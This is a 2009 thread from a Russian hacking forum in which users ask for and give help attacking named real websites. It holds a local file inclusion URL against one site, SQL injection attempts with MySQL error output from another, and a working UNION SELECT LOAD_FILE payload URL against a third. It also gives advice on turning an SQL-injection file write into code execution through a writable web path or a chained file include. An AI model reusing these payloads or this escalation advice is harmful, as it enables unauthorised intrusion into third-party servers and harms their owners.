Ваши вопросы по уязвимостям.

26.07.2009, 13:53

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Pavlov, hex не поможет тут...
Byrger, если ты и сможешь подделать IP, всеравно экранировка кавычки произойдет.

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось mailbrush; 26.07.2009 в 13:56..

26.07.2009, 18:57

Assembler

Участник форума

Регистрация: 01.09.2007

Сообщений: 203

С нами: 9838057

Репутация: 302

http://www.acumenin.com/index.php?p=../index.php

Можно ли что нить придумать дальше? Не силен в инклюдах =(

26.07.2009, 19:17

S00pY

Познающий

Регистрация: 24.04.2007

Сообщений: 92

С нами: 10025299

Репутация: 412

Можно.... Например записать в сессию пхп код... далее инклудить его.
Поискать возможности заливки файла для дальнейшего инклуда и тд. и тп.

27.07.2009, 18:07

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

С нами: 8947056

Репутация: 229

Всем здрасти...
Есть скул
При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость)
Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1

Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2'

(1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--)

При заменне плюсеков на пробелы вылазиет след. ошибка:

1109 - Unknown table 'pd' in field list

(значит внедрение запроса по идее возможно)

Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает

28.07.2009, 09:20

~~nub-hacker~~

Banned

Регистрация: 23.06.2009

Сообщений: 89

С нами: 8886744

Репутация: -67

Цитата:

Сообщение от Ctacok

Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo

я всё правильно делал,просто описался. ты хоть сам бы по пробовал залить прежде чем писать.

28.07.2009, 12:54

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

nub-hacker

Код:

потом

пытаюсь открыть

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--

нифига не раб. помогите плиз.

почему не работает, как раз всё прекрасно в папку tmp залилось, что можнно проверить, пройдя по твоей последней ссылке:

Код:

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--

посмотреть сорцы страницы, CTRL+F "<?", и ты увидишь там свой "<?phpinfo();?>"

Просто сначала ты писал "читалка", а потом почему-то ждешь исполнения того, что загрузил. На самом деле через SQL-inj то, что загрузил - то просто сможешь также ПРОЧИТАТЬ.

Чтобы файло, загруженное через скулю заработало, его (файло) надо загружать в папку, доступную из веба (т.е. чтобы можно было набрать к нему путь в адресной строке браузера), но для этого необходимы 2 условия:

1. Знать полный абсолютный путь к серверу (а не просто /tmp, которая просто является фактическим тестом рабочести load_file). Папка "/tmp"Не всегда бывает доступна на запись, что часто многих начинающих сбивает с толку и они бросают такие скули.

2. Папка должна быть доступна на запись

ЗЫЖ Ну или как ты, в /tmp, но потом искать LFI, чтобы из этой /tmp проинклудить (читай - выполнить) твой phpinfo.php

Последний раз редактировалось Pashkela; 28.07.2009 в 13:08..